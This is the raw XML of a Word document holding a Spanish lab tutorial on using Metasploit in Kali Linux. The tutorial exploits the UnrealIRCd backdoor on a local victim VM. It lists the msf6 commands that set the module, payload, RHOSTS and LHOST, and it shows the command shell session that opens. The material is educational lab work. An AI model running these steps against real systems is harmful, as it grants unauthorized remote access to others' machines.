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DF3D" w14:textId="6E300E8E" w:rsidR="00090441" w:rsidRDefault="00B123FA" w:rsidP="00B123F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123FA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Usar METASPLOIT en KALI LINUX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC5D52E" w14:textId="77777777" w:rsidR="002F5A7D" w:rsidRDefault="002F5A7D" w:rsidP="00B123F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569E90" w14:textId="0CB9AEF3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ingresamos a Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15732253" w14:textId="36A9F2AD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2 - buscamos metasploit framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5F3BFF" w14:textId="294D1209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3 - ingresamos la contraseña es la misma.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E7242A" w14:textId="5D9939F9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Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AEEF8C" w14:textId="26E7B858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debemos saber que vulnerabilidad vamos a explotar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3679C27C" w14:textId="581056E1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Metasploit tiene un buscador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F61AA4" w14:textId="5E37C3C6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vamos a explotar el unrealircd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD18F73" w14:textId="0E5E99E2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ponemos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC04293" w14:textId="3751F4BD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unrealircd </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11111C13" w14:textId="6B9BAF82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nos damos cuenta que encuentra un exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8FDAE0" w14:textId="645539C6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encendemos nuestra maquina victima metasploit </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F6A894" w14:textId="7E7F3172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este exploit que encontramos aparece con un cero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32660E27" w14:textId="0B01DD46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selecionamos ese exploit de esta manera:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2D0A7E" w14:textId="01313C51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use 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D91A4C0" w14:textId="74D5BC3E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 algo asi en rojo: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6F97D0" w14:textId="3A343F95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 w:rsidRPr="00525B34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB21C91" w14:textId="3114E5FB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le damos : show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48892241" w14:textId="218F1D72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 w:rsidRPr="00525B34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0865A7C0" w14:textId="38B160AE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debemos agregar un paylo</w:t>
      </w:r>
      <w:r w:rsidR="007E0D43">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB3FBD0" w14:textId="0495FCCE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Oase el exploit : entra , aprovecha la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8F9BE7" w14:textId="7D130207" w:rsidR="00525B34" w:rsidRDefault="00525B34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el : payl</w:t>
      </w:r>
      <w:r w:rsidR="007E0D43">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oads es lo que se encarga de actuar dentro de la maquina victima</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77490FF2" w14:textId="23A83051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– debemos cargar el payloads :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686E920B" w14:textId="40A12085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payloads </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674EF262" w14:textId="69581750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12 - </w:t>
      </w:r>
      <w:r w:rsidRPr="007E0D43">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) &gt; show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEA5369" w14:textId="2F1E80A8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– escogemos un payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1044CF" w14:textId="14D6335F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 w:rsidRPr="007E0D43">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) &gt; set payload 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0327989C" w14:textId="047512F4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 – ya esta selecionado :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF047CB" w14:textId="59830296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 w:rsidRPr="007E0D43">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A98575" w14:textId="74E6811C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– ponemos la IP de la maquina victima</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2640FF14" w14:textId="675C4E8C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 w:rsidRPr="007E0D43">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) &gt; set RHOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="007E0D43">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E1B9E5" w14:textId="01F08AC7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– hacemos un show options para verificar que esta seleccionado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3DC1" w14:textId="5ABF076B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 – ahora colocamos nustra IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC16EA6" w14:textId="26599ABD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 w:rsidRPr="00B43C11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) &gt; set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF3F9D4" w14:textId="27BCBAB8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– de nuevo un show options </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46785B98" w14:textId="62611232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Vemos que la IP y el puerto de la victima y el de mi maquina están seleccionados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E32C453" w14:textId="22936B22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– ahora ejecutamos el comando run para que el ataque se efectue de manera automática y vamos a ganar acceso remoto a al maquina victima.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3554FA7E" w14:textId="77777777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</w:p>
    <w:p w14:paraId="4D615596" w14:textId="4FAA8429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 w:rsidRPr="00B43C11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EC1874" w14:textId="77777777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</w:p>
    <w:p w14:paraId="7CD08339" w14:textId="70290E82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nos muestra esto que es que tenemos acceso remoto </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16542207" w14:textId="4DB713EE" w:rsidR="00B43C11" w:rsidRDefault="00B43C11" w:rsidP="002F5A7D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B43C11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[*] Command shell session 1 opened (192.168.1.10:4444 -&gt; 192.168.1.9:49135) at 2024-07-21 21:08:17 -0400</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447BCA45" w14:textId="638C38AE" w:rsidR="00A8222D" w:rsidRDefault="00A8222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Navegamos al home y podemos crear un archivo para probar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABEBC9F" w14:textId="2FE561BF" w:rsidR="00A8222D" w:rsidRDefault="00A8222D" w:rsidP="002F5A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touch pruebaMetasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596CB582" w14:textId="77777777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</w:p>
    <w:p w14:paraId="3243D01B" w14:textId="77777777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</w:p>
    <w:p w14:paraId="16DD7BDF" w14:textId="77777777" w:rsidR="007E0D43" w:rsidRDefault="007E0D43" w:rsidP="002F5A7D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54FF6740" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="29E67B73" w14:textId="77777777" w:rsidR="002F5A7D" w:rsidRPr="002F5A7D" w:rsidRDefault="002F5A7D" w:rsidP="002F5A7D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="002F5A7D" w:rsidRPr="002F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FA"/>
    <w:rsid w:val="00090441"/>
    <w:rsid w:val="002F5A7D"/>
    <w:rsid w:val="00333063"/>
    <w:rsid w:val="00525B34"/>
    <w:rsid w:val="006A4D93"/>
    <w:rsid w:val="007E0D43"/>
    <w:rsid w:val="00A8222D"/>
    <w:rsid w:val="00B123FA"/>
    <w:rsid w:val="00B43C11"/>
    <w:rsid w:val="00F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A240"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E2EE9B0C-0052-4B5E-BDC4-F11045FE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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-22T00:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-22T01:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>